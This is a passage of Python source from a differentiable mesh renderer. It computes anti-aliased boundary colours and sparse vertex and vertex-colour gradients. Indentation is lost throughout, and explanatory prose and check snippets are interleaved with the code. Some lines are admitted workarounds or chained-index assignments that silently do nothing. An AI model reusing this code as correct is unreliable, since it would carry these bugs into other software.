finalColorBnd = sampleColors * d_finalNP.reshape([self.nsamples, -1,1]) / (self.d_final_total.reshape([1, -1,1]))
# finalColorBnd = areaWeights[:,:,None] * sampleColors * d_finalNP.reshape([self.nsamples, -1,1]) / (self.d_final_total.reshape([1, -1,1]) * areaWeightsTotal[None,:,None])
self.finalColorBnd = finalColorBnd
# else:
# finalColorBnd = sampleColors
bndColorsImage = np.zeros_like(self.color_image)
bndColorsImage[(zerosIm * boundaryImage), :] = np.sum(finalColorBnd, axis=0)
finalColorImageBnd = bndColorsImage
if self.imageGT is not None:
bndColorsResiduals = np.zeros_like(self.color_image)
self.sampleResiduals = (sampleColors - self.imageGT.r[(zerosIm * boundaryImage),:][None,:])
self.sampleResidualsWeighted = self.sampleResiduals**2 * d_finalNP.reshape([self.nsamples, -1,1]) / self.d_final_total.reshape([1, -1,1])
bndColorsResiduals[(zerosIm * boundaryImage), :] = np.sum(self.sampleResidualsWeighted,0)
if np.any(boundaryImage):
finalColor = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * finalColorImageBnd
if self.imageGT is not None:
self.residuals = (self.color_image - self.imageGT.r)
errors = self.residuals**2
finalResidual = (1 - boundaryImage)[:, :, None] * errors + boundaryImage[:, :, None] * bndColorsResiduals
else:
finalColor = self.color_image
if self.imageGT is not None:
finalResidual = (self.color_image - self.imageGT.r)**2
if self.imageGT is None:
finalResidual = None
finalColor = np.clip(finalColor, 0., 1.)  # np.clip returns a copy, so self.color_image is not mutated in the non-boundary branch
return finalColor, finalResidual
def compute_derivatives_verts(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
# xdiff = dEdx
# ydiff = dEdy
nVisF = len(visibility.ravel()[visible])
# projVertices = self.camera.r[f[visibility.ravel()[visible]].ravel()].reshape([nVisF,3, 2])
boundaryImage = self.boundarybool_image.astype(bool) & (visibility != 4294967295)
rangeIm = np.arange(self.boundarybool_image.size)
zerosIm = np.ones(self.boundarybool_image.shape).astype(bool)
edge_visibility = self.boundaryid_image
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 2])
nsamples = self.nsamples
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape(
[nsamples, -1, 2])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(bool)].reshape([nsamples, -1]) - 1
if 4294967295 in sampleFaces:
sampleFaces[sampleFaces == 4294967295] = 0  # Not correct; needs further investigation.
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage) & (visibility != 4294967295)]
if np.any(boundaryImage):
n_norm = self.n_norm
dist = self.dist
linedist = self.linedist
d = self.d
v1 = self.v1
lnorm = self.lnorm
d_final = self.d_final
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
# vertsProjBnd[None, :] - sampleV[:,None,:]
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1, 1, 1])
# Computing gradients:
# A multisampled pixel color is given by: w R + (1-w) R', thus:
# 1 derivative of outside samples wrt v1: (dw * (bar*vc) - dw * (bar'*vc')) / nsamples, for the sample's face
# 2 derivative of outside samples wrt the sample barycentrics: (w * (dbar*vc)) / nsamples, for the sample's face
# 3 derivative of outside samples wrt the edge barycentrics: ((1-w) * (dbar'*vc')) / nsamples, for the edge's faces (barv1', barv2', 0)
# 4 derivative of outside samples wrt vc: (w * bar) / nsamples, for the sample's face
# 5 derivative of outside samples wrt vc: ((1-w) * bar') / nsamples, for the edge's faces
# 6 derivative of inside samples wrt v: (dbar'*vc') / nsamples, for the sample's face
# 7 derivative of inside samples wrt vc: bar / nsamples, for the sample's face
# For every boundary pixel (i, j) we have a list of sample faces; compute gradients at each and sum them according to face identity.
# - Best: create a sparse matrix per sample and sum them; the same can be done for the boundary.
# Finally, stack the data and IJ indices of non-boundary with boundary for both dwrt_v and dwrt_vc.
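The weighting scheme described in the comments above (a boundary pixel's color as a distance-weighted mixture of its sub-sample colors, as in `finalColorBnd = sampleColors * d_final / d_final_total`) can be sketched numerically. The names and random values below are purely illustrative, not the renderer's actual buffers:

```python
import numpy as np

# Toy version of the boundary-pixel weighting: per-sample distances become
# convex weights, and the pixel color is the weighted sum of sample colors.
nsamples, npix = 4, 2
rng = np.random.default_rng(0)
sample_colors = rng.random([nsamples, npix, 3])  # per-sample RGB
d = rng.random([nsamples, npix]) + 1e-3          # per-sample edge distances
d_total = d.sum(0, keepdims=True)                # normalizer per pixel
weights = d / d_total                            # convex weights per pixel
pixel_color = (weights[:, :, None] * sample_colors).sum(0)
assert np.allclose(weights.sum(0), 1.0)          # weights form a partition of unity
```

Because the weights are convex, each output channel stays inside the range spanned by the sample colors, which is why the clamping at the end of the method rarely triggers on boundary pixels.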
######## 1 derivatives samples outside wrt v 1: (dw * (bar*vc) - dw (bar'*vc') )/ nsamples for face sample
# # #Chumpy autodiff code to check derivatives here:
# chEdgeVerts = ch.Ch(vertsProjBndSamples.reshape([-1,2,2]))
#
# chEdgeVerts1 = chEdgeVerts[:,0,:]
# chEdgeVerts2 = chEdgeVerts[:,1,:]
#
# chSampleVerts = ch.Ch(sampleV.reshape([-1,2]))
# # c1 = (chEdgeVerts1 - chSampleVerts)
# # c2 = (chEdgeVerts2 - chSampleVerts)
# # n = (chEdgeVerts2 - chEdgeVerts1)
#
# #Code to check computation of distance below
# # d2 = ch.abs(c1[:,:,0]*c2[:,:,1] - c1[:,:,1]*c2[:,:,0]) / ch.sqrt((ch.sum(n**2,2)))
# # # np_mat = ch.dot(ch.array([[0,-1],[1,0]]), n)
# # np_mat2 = -ch.concatenate([-n[:,:,1][:,:,None], n[:,:,0][:,:,None]],2)
# # np_vec2 = np_mat2 / ch.sqrt((ch.sum(np_mat2**2,2)))[:,:,None]
# # d2 = d2 / ch.maximum(ch.abs(np_vec2[:,:,0]),ch.abs(np_vec2[:,:,1]))
#
# chl = (chEdgeVerts2 - chEdgeVerts1)
# chlinedist = ch.sqrt((ch.sum(chl**2,axis=1)))[:,None]
# chlnorm = chl/chlinedist
#
# chv1 = chSampleVerts - chEdgeVerts1
#
# chd = chv1[:,0]* chlnorm[:,0] + chv1[:,1]* chlnorm[:,1]
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
# # intersectPointDist1 = intersectPoint - chEdgeVerts1
# # intersectPointDist2 = intersectPoint - chEdgeVerts2
# # Code to check computation of distances below:
# # lengthIntersectToPoint1 = np.linalg.norm(intersectPointDist1.r,axis=1)
# # lengthIntersectToPoint2 = np.linalg.norm(intersectPointDist2.r,axis=1)
#
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
#
# chlineToPoint = (chSampleVerts - chintersectPoint)
# chn_norm = chlineToPoint / ch.sqrt((ch.sum(chlineToPoint ** 2, axis=1)))[:, None]
#
# chdist = chlineToPoint[:,0]*chn_norm[:,0] + chlineToPoint[:,1]*chn_norm[:,1]
#
# # d_final_ch = chdist / ch.maximum(ch.abs(chn_norm[:, 0]), ch.abs(chn_norm[:, 1]))
# d_final_ch = chdist
#
# d_final_ch_weights = sampleColors * (d_final_ch.reshape([self.nsamples, -1]) / ch.sum(d_final_ch.reshape([self.nsamples, -1]), 0))[:,:,None]
#
# d_final_outside = d_final_ch.ravel()
# dwdv = d_final_outside.dr_wrt(chEdgeVerts1)
# rows = np.tile(np.arange(d_final_outside.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_outside.shape[0] * 2)
#
# dwdv_r_v1 = np.array(dwdv[rows, cols]).reshape([-1, 2])
#
# dwdv = d_final_outside.dr_wrt(chEdgeVerts2)
# rows = np.tile(np.arange(d_final_ch.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_ch.shape[0] * 2)
#
# dwdv_r_v2 = np.array(dwdv[rows, cols]).reshape([-1, 2])
nonIntersect = self.nonIntersect
argminDistNonIntersect = self.argminDistNonIntersect
# max_dx_dy = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
d_final_np = dist
# d_final_np = dist / max_dx_dy
ident = np.identity(2)
ident = np.tile(ident[None, :], [len(d_final_np), 1, 1])
dlnorm = (ident - np.einsum('ij,ik->ijk', lnorm, lnorm)) / linedist[:, None]
dl_normdp1 = np.einsum('ijk,ikl->ijl', dlnorm, -ident)
dl_normdp2 = np.einsum('ijk,ikl->ijl', dlnorm, ident)
dv1dp1 = -ident
dv1dp2 = 0
dddp1 = np.einsum('ijk,ij->ik', dv1dp1, lnorm) + np.einsum('ij,ijl->il', v1, dl_normdp1)
dddp2 = 0 + np.einsum('ij,ijl->il', v1, dl_normdp2)
dipdp1 = ident + (dddp1[:, None, :] * lnorm[:, :, None]) + d[:, None, None] * dl_normdp1
dipdp2 = (dddp2[:, None, :] * lnorm[:, :, None]) + d[:, None, None] * dl_normdp2
#good up to here.
dndp1 = -dipdp1
dndp2 = -dipdp2
dn_norm = (ident - np.einsum('ij,ik->ijk', n_norm, n_norm)) / dist[:, None]
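The `dlnorm` and `dn_norm` expressions above both instantiate the standard Jacobian of vector normalization: for u(v) = v / ‖v‖, du/dv = (I − û ûᵀ) / ‖v‖. A minimal finite-difference check of that identity, on a made-up 2D vector:

```python
import numpy as np

def normalize(v):
    return v / np.linalg.norm(v)

v = np.array([3.0, -1.5])
u = normalize(v)
# Analytic Jacobian: projects onto the plane orthogonal to u, scaled by 1/||v||.
J = (np.eye(2) - np.outer(u, u)) / np.linalg.norm(v)

# Central finite differences, one column per input coordinate.
eps = 1e-6
J_fd = np.stack([(normalize(v + eps * e) - normalize(v - eps * e)) / (2 * eps)
                 for e in np.eye(2)], axis=1)
assert np.allclose(J, J_fd, atol=1e-6)
```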
# dn_normdp1 = np.einsum('ijk,ikl->ijl', dn_norm, dndp1)
# dn_normdp2 = np.einsum('ijk,ikl->ijl', dn_norm, dndp2)
ddistdp1 = np.einsum('ij,ijl->il', n_norm, dndp1)
ddistdp2 = np.einsum('ij,ijl->il', n_norm, dndp2)
# argmax_nx_ny = np.argmax(np.abs(n_norm), axis=1)
# dmax_nx_ny_p1 = np.sign(n_norm)[np.arange(len(n_norm)), argmax_nx_ny][:, None] * dn_normdp1[np.arange(len(dn_normdp1)), argmax_nx_ny]
# dmax_nx_ny_p2 = np.sign(n_norm)[np.arange(len(n_norm)), argmax_nx_ny][:, None] * dn_normdp2[np.arange(len(dn_normdp2)), argmax_nx_ny]
# dd_final_dp1 = -1. / max_dx_dy[:, None] ** 2 * dmax_nx_ny_p1 * dist + 1. / max_dx_dy[:, None] * ddistdp1
# dd_final_dp2 = -1. / max_dx_dy[:, None] ** 2 * dmax_nx_ny_p2 * dist + 1. / max_dx_dy[:, None] * ddistdp2
dd_final_dp1 = ddistdp1
dd_final_dp2 = ddistdp2
# For those non intersecting points straight to the edge:
v1 = self.v1[nonIntersect][argminDistNonIntersect == 0]
v1_norm = v1 / np.sqrt((np.sum(v1 ** 2, axis=1)))[:, None]
dd_final_dp1_nonintersect = -v1_norm
v2 = self.v2[nonIntersect][argminDistNonIntersect == 1]
v2_norm = v2 / np.sqrt((np.sum(v2 ** 2, axis=1)))[:, None]
dd_final_dp2_nonintersect = -v2_norm
dd_final_dp1[nonIntersect][argminDistNonIntersect == 0] = dd_final_dp1_nonintersect
dd_final_dp1[nonIntersect][argminDistNonIntersect == 1] = 0
dd_final_dp2[nonIntersect][argminDistNonIntersect == 1] = dd_final_dp2_nonintersect
dd_final_dp2[nonIntersect][argminDistNonIntersect == 0] = 0
dd_final_dp1_weighted_part1 = -self.d_final[:,None]* np.tile(dd_final_dp1.reshape([self.nsamples, -1, 2]).sum(0)[None,:,:],[self.nsamples,1,1]).reshape([-1, 2])/(np.tile(self.d_final_total[None,:], [self.nsamples, 1,1]).reshape([-1,1])**2)
dd_final_dp1_weighted_part2 = dd_final_dp1 / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1])
dd_final_dp1_weighted = dd_final_dp1_weighted_part1 + dd_final_dp1_weighted_part2
dd_final_dp2_weighted_part1 = -self.d_final[:,None]*np.tile(dd_final_dp2.reshape([self.nsamples, -1, 2]).sum(0)[None,:,:],[self.nsamples,1,1]).reshape([-1, 2])/(np.tile(self.d_final_total[None,:], [self.nsamples, 1,1]).reshape([-1,1])**2)
dd_final_dp2_weighted_part2 = dd_final_dp2 / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1])
dd_final_dp2_weighted = dd_final_dp2_weighted_part1 + dd_final_dp2_weighted_part2
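The two `*_weighted` parts above apply the quotient rule to the normalized weights w_i = d_i / Σ_j d_j (the `part1` term carries −d_i·S′/S², the `part2` term d′_i/S). A finite-difference check of that Jacobian on made-up distances:

```python
import numpy as np

# For w_i = d_i / S with S = sum_j d_j, the Jacobian is
# dw_i/dd_k = (delta_ik * S - d_i) / S**2.
d = np.array([1.0, 2.0, 3.0])
S = d.sum()
J = (np.eye(3) * S - d[:, None]) / S**2

# Central finite differences, one column per perturbed distance.
eps = 1e-6
J_fd = np.stack([((d + eps * e) / (d + eps * e).sum()
                  - (d - eps * e) / (d - eps * e).sum()) / (2 * eps)
                 for e in np.eye(3)], axis=1)
assert np.allclose(J, J_fd, atol=1e-6)
```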
if self.imageGT is None:
dImage_wrt_outside_v1 = sampleColors.reshape([-1,3,1]) * dd_final_dp1_weighted[:, None, :]
dImage_wrt_outside_v2 = sampleColors.reshape([-1,3,1]) * dd_final_dp2_weighted[:, None, :]
else:
dImage_wrt_outside_v1 = self.sampleResiduals.reshape([-1,3,1])**2 * dd_final_dp1_weighted[:, None, :]
dImage_wrt_outside_v2 = self.sampleResiduals.reshape([-1,3,1])**2 * dd_final_dp2_weighted[:, None, :]
# sampleV
# z = dd_final_dp1.reshape([8, -1, 2])
# eq = np.array([np.all(np.sign(z[:, i, :]) == -1) or np.all(np.sign(z[:, i, :]) == 1) for i in range(z.shape[1])])
# dist_ns = dist.reshape([8,-1])
# rightV = sampleV[0, :, 0] > np.max(sampleV[0, :, :], 0)[0] - 1
# dist_ns[0, rightV]
# dImage_wrt_outside_v1.reshape([8, -1, 3, 2])[0, rightV,:]
# d_final_ch_weights
# self.finalColorBnd
### Derivatives wrt V:
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])
IS = np.tile(col(pixels), (1, 2 * 2)).ravel()
faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()
faces = np.tile(faces.reshape([1, -1, 2]), [self.nsamples, 1, 1]).ravel()
JS = col(faces)
JS = np.hstack((JS * 2, JS * 2 + 1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS * n_channels + i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data1 = dImage_wrt_outside_v1.transpose([1, 0, 2])
data2 = dImage_wrt_outside_v2.transpose([1, 0, 2])
data = np.concatenate([data1[:, :, None, :], data2[:, :, None, :]], 2)
data = data.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bnd = sp.csc_matrix((data, ij), shape=(image_width * image_height * n_channels, num_verts * 2))
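The Jacobian above is assembled with SciPy's triplet constructor, which sums duplicate (row, col) entries on conversion; that summing is what accumulates gradient contributions from different samples landing on the same pixel/vertex pair. A toy sketch with illustrative values:

```python
import numpy as np
import scipy.sparse as sp

# Two entries at (0, 2) are summed automatically; (1, 0) stays as-is.
rows = np.array([0, 0, 1])
cols = np.array([2, 2, 0])
data = np.array([1.0, 2.0, 5.0])
J = sp.csc_matrix((data, (rows, cols)), shape=(2, 3))
assert J[0, 2] == 3.0  # 1.0 + 2.0 accumulated
assert J[1, 0] == 5.0
```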
######## 2 derivatives samples wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
verticesBnd = self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3])
sampleBarycentricBar = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool),
:].reshape([-1, 3, 1])
verts = np.sum(self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3, 3]) * sampleBarycentricBar, axis=1)
dImage_wrt_bar_v = self.barycentricDerivatives(verticesBnd, f[sampleFaces.ravel()], verts).swapaxes(0, 1)
if self.imageGT is None:
# dImage_wrt_bar_v = dImage_wrt_bar_v * d_final[:, None, None, None] * self.t_area_bnd[:, None, None, None] / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
dImage_wrt_bar_v = dImage_wrt_bar_v * d_final[:, None, None, None] / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
# areaTotal = np.tile(self.areaWeightsTotal[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
# d_final_total = np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
# dImage_wrt_bar_v = self.areaWeights.reshape([-1,1,1,1]) * dImage_wrt_bar_v * d_final[:, None, None, None] / (areaTotal*d_final_total)
else:
dImage_wrt_bar_v = 2*self.sampleResiduals.reshape([-1,3])[:,:,None,None] * dImage_wrt_bar_v * d_final[:, None, None, None] * self.t_area_bnd[:, None, None, None] / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
### Derivatives wrt V: 2 derivatives samples wrt v bar: (w * (dbar*vc) )/ nsamples for faces sample
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])
IS = np.tile(col(pixels), (1, 2 * f.shape[1])).ravel()
faces = f[sampleFaces].ravel()
JS = col(faces)
JS = np.hstack((JS * 2, JS * 2 + 1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS * n_channels + i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = np.transpose(dImage_wrt_bar_v, [1, 0, 2, 3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bnd_bar = sp.csc_matrix((data, ij), shape=(image_width * image_height * n_channels, num_verts * 2))
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
verticesNonBnd = self.v.r[f[nonBoundaryFaces].ravel()]
vertsPerFaceProjBnd = self.camera.r[f[nonBoundaryFaces].ravel()].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:, 0, :], np.ones([nv, 1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:, 1, :], np.ones([nv, 1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:, 2, :], np.ones([nv, 1])]
t_area_nonbnd = np.abs(np.linalg.det(np.concatenate([p0_proj[:, None], p1_proj[:, None], p2_proj[:, None]], axis=1)) * 0.5)
t_area_nonbnd[t_area_nonbnd > 1] = 1
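The screen-space triangle area computed for `t_area_nonbnd` above is the homogeneous-determinant (shoelace) formula: append a 1 to each projected 2D vertex and take |det| / 2. A minimal check with a made-up triangle:

```python
import numpy as np

tri = np.array([[0.0, 0.0], [4.0, 0.0], [0.0, 3.0]])  # right triangle, legs 4 and 3
hom = np.c_[tri, np.ones(3)]                          # 3x3 homogeneous matrix
area = np.abs(np.linalg.det(hom)) * 0.5
assert np.isclose(area, 6.0)
```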
bc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
verts = np.sum(self.v.r[f[nonBoundaryFaces.ravel()].ravel()].reshape([-1, 3, 3]) * bc[:, :, None], axis=1)
didp = self.barycentricDerivatives(verticesNonBnd, f[nonBoundaryFaces.ravel()], verts)
if self.imageGT is None:
# didp = didp * t_area_nonbnd[None, :, None, None]
pass  # didp is used as-is
else:
didp = 2 * self.residuals[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3)).T[:,:,None,None] * didp * t_area_nonbnd[None, :, None, None]
n_channels = np.atleast_3d(observed).shape[2]
####### 2: Take the data and copy the corresponding dxs and dys to these new pixels.
### Derivatives wrt V:
pixels = np.where(((~boundaryImage) & (visibility != 4294967295)).ravel())[0]
IS = np.tile(col(pixels), (1, 2 * f.shape[1])).ravel()
JS = col(f[nonBoundaryFaces].ravel())
JS = np.hstack((JS * 2, JS * 2 + 1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS * n_channels + i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = didp.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_nonbnd = sp.csc_matrix((data, ij), shape=(image_width * image_height * n_channels, num_verts * 2))
if np.any(boundaryImage):
result_wrt_verts = result_wrt_verts_bnd + result_wrt_verts_bnd_bar + result_wrt_verts_nonbnd
else:
result_wrt_verts = result_wrt_verts_nonbnd
return result_wrt_verts
def compute_derivatives_vc(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
d_final = self.d_final
boundaryImage = self.boundarybool_image.astype(bool) & (visibility != 4294967295)
zerosIm = np.ones(self.boundarybool_image.shape).astype(bool)
nsamples = self.nsamples
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(bool)].reshape([nsamples, -1]) - 1
sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool),
:].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage) & (visibility != 4294967295)]
if np.any(boundaryImage):
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
# Computing gradients:
# A multisampled pixel color is given by: w R + (1-w) R', thus:
# 1 derivative of samples wrt v1: (dw * (bar*vc) - dw * (bar'*vc')) / nsamples, for the sample's face
# 2 derivative of samples wrt the sample barycentrics: (w * (dbar*vc)) / nsamples, for the sample's face
# 4 derivative of samples wrt vc: (w * bar) / nsamples, for the sample's face
# For every boundary pixel (i, j) we have a list of sample faces; compute gradients at each and sum them according to face identity.
# - Best: create a sparse matrix per sample and sum them; the same can be done for the boundary.
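Item 4 above reduces to the fact that an interpolated pixel color is linear in the vertex colors, so the derivative with respect to each vertex color is just its barycentric weight. A toy check with made-up weights and colors:

```python
import numpy as np

bar = np.array([0.2, 0.5, 0.3])      # barycentric weights, sum to 1
vc = np.array([[1.0, 0.0, 0.0],
               [0.0, 1.0, 0.0],
               [0.0, 0.0, 1.0]])     # per-vertex RGB
c = bar @ vc                         # interpolated color = sum_k bar[k] * vc[k]
assert np.allclose(c, [0.2, 0.5, 0.3])

# Perturbing vertex 0's color by delta changes the pixel by bar[0] * delta:
delta = np.array([0.1, 0.0, 0.0])
c2 = bar @ (vc + np.vstack([delta, np.zeros((2, 3))]))
assert np.allclose(c2 - c, bar[0] * delta)
```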
####### 4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
if self.imageGT is None:
dImage_wrt_bnd_vc = d_final[:, None] * sampleBarycentric.reshape([-1,3]) / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1,1])
else:
dImage_wrt_bnd_vc = d_final[:, None] * sampleBarycentric.reshape([-1,3]) / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1,1])
dImage_wrt_bnd_vc = 2 * self.sampleResiduals.reshape([-1,3]).T[:,:,None] * dImage_wrt_bnd_vc[None,:]
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])
IS = np.tile(col(pixels), (1, 3)).ravel()
if 4294967295 in sampleFaces:
sampleFaces[sampleFaces == 4294967295] = 0  # Not correct; needs further investigation.
faces = f[sampleFaces].ravel()
JS = col(faces)
data = dImage_wrt_bnd_vc.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
if self.imageGT is None:
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_bnd = result
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.where(((~boundaryImage) & (visibility != 4294967295)).ravel())[0]
IS = np.tile(col(pixels), (1, 3)).ravel()
JS = col(f[nonBoundaryFaces].ravel())
if self.imageGT is None:
dImage_wrt_nonbnd_vc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
else:
dImage_wrt_nonbnd_vc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
dImage_wrt_nonbnd_vc = 2* self.residuals[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3)).T[:,:,None] * dImage_wrt_nonbnd_vc[None,:]
data = np.asarray(dImage_wrt_nonbnd_vc, order='C').ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
if self.imageGT is None:
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_nonbnd = result
if np.any(boundaryImage):
result_wrt_vc = result_wrt_vc_bnd + result_wrt_vc_nonbnd
else:
result_wrt_vc = result_wrt_vc_nonbnd
return result_wrt_vc
def on_changed(self, which):
super().on_changed(which)
if 'v' in which or 'camera' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_verts_mesh[mesh][polygons].set_array(verts_by_face.astype(np.float32))
self.vbo_verts_mesh[mesh][polygons].bind()
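The dirty-flag checks in `on_changed` hinge on operator precedence and are easy to get wrong: `'v' or 'camera' in which` parses as `'v' or ('camera' in which)`, and a non-empty string literal is always truthy. A small demonstration, with `which` as an illustrative set of changed-attribute names:

```python
which = {'f'}  # illustrative: only 'f' changed
assert ('v' or 'camera' in which)                    # always True, regardless of which
assert not ('v' in which or 'camera' in which)       # the intended membership test
assert not any(a in which for a in ('v', 'camera'))  # equivalent, scales to more names
```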
if 'vc' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if 'f' in which:
self.vbo_indices.set_array(self.f.astype(np.uint32))
self.vbo_indices.bind()
self.vbo_indices_range.set_array(np.arange(self.f.size, dtype=np.uint32).ravel())
self.vbo_indices_range.bind()
flen = 1
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
# fc = np.arange(flen, flen + len(f))
fc = np.tile(np.arange(flen, flen + len(f))[:, None], [1, 3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
self.vbo_face_ids_list[mesh][polygons].set_array(fc)
self.vbo_face_ids_list[mesh][polygons].bind()
flen += len(f)
self.vbo_indices_mesh_list[mesh][polygons].set_array(np.array(self.f_list[mesh][polygons]).astype(np.uint32))
self.vbo_indices_mesh_list[mesh][polygons].bind()
if 'texture_stack' in which:
# gl = self.glf
# texture_data = np.array(self.texture_image*255., dtype='uint8', order='C')
# self.release_textures()
#
# for mesh in range(len(self.f_list)):
# textureIDs = []
# for polygons in range(len(self.f_list[mesh])):
# texture = None
# if self.haveUVs_list[mesh][polygons]:
# texture = GL.GLuint(0)
# GL.glGenTextures( 1, texture )
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# #Send texture.
# #Pol: Check if textures are float or uint from Blender import.
# image = (self.textures_list[mesh][polygons]*255.0).astype(np.uint8)
# GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, GL.GL_RGB8, image.shape[1], image.shape[0], 0, GL.GL_RGB, GL.GL_UNSIGNED_BYTE, image)
# textureIDs = textureIDs + [texture]
# self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs]
# gl.GenTextures(1, tmp) # TODO: free after done
